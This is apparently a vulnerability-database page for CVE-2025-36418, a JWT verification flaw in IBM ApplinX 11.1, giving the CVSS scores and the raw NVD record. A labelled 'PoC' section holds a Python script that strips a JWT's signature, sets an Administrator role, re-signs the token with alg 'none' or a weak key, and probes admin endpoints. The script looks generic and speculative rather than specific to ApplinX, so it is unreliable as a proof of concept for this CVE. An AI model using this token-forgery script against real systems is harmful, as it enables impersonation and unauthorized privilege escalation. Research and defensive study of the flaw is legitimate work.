Security Vulnerability Report
中文
CVE-2025-36418 CVSS 7.3 HIGH

CVE-2025-36418

Published: 2026-01-20 16:16:05
Last Modified: 2026-01-26 19:46:20

Description

IBM ApplinX 11.1 is vulnerable due to a privilege escalation vulnerability due to improper verification of JWT tokens. An attacker may be able to craft or modify a JSON web token in order to impersonate another user or to elevate their privileges.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ibm:applinx:11.1.0:*:*:*:*:*:*:* - VULNERABLE
IBM ApplinX 11.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import jwt import requests # CVE-2025-36418 PoC - JWT Token Privilege Escalation # Target: IBM ApplinX 11.1 TARGET_URL = "https://target-server:8443/ApplinX/api/v1" # Step 1: Obtain a valid JWT token (e.g., from login endpoint) # login_response = requests.post(f"{TARGET_URL}/login", json={"username": "attacker", "password": "password"}) # original_token = login_response.json()['token'] # For demonstration, using a placeholder token original_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYXR0YWNrZXIiLCJyb2xlIjoiVXNlciJ9.signature" # Step 2: Decode and modify the JWT token decoded = jwt.decode(original_token, options={"verify_signature": False}) print(f"Original token claims: {decoded}") # Step 3: Elevate privileges by modifying the role claim decoded['role'] = 'Administrator' # or 'admin' decoded['privileges'] = ['read', 'write', 'delete', 'admin'] # Step 4: Re-encode the token (exploit weak signature verification) # Note: Some implementations are vulnerable to alg:none or use weak secret keys exploited_token = jwt.encode(decoded, "", algorithm="none") # Alternative: jwt.encode(decoded, "weak-secret-key", algorithm="HS256") print(f"Exploited token: {exploited_token}") # Step 5: Use the modified token to access privileged endpoints headers = {"Authorization": f"Bearer {exploited_token}"} # Attempt to access admin functionality admin_endpoints = [ "/users", "/config", "/admin/settings" ] for endpoint in admin_endpoints: response = requests.get(f"{TARGET_URL}{endpoint}", headers=headers, verify=False) print(f"Endpoint: {endpoint}, Status: {response.status_code}") if response.status_code == 200: print(f"[+] Privilege escalation successful! Access granted to {endpoint}") print(f"Response: {response.text[:500]}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36418", "sourceIdentifier": "[email protected]", "published": "2026-01-20T16:16:04.790", "lastModified": "2026-01-26T19:46:19.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM ApplinX 11.1 is vulnerable due to a privilege escalation vulnerability due to improper verification of JWT tokens. An attacker may be able to craft or modify a JSON web token in order to impersonate another user or to elevate their privileges."}, {"lang": "es", "value": "IBM ApplinX 11.1 es vulnerable debido a una vulnerabilidad de escalada de privilegios debido a la verificación incorrecta de tokens JWT. Un atacante podría crear o modificar un token web JSON para suplantar a otro usuario o para elevar sus privilegios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:applinx:11.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "7116F100-D485-4B66-A910-9A4663360A0F"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7257446", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}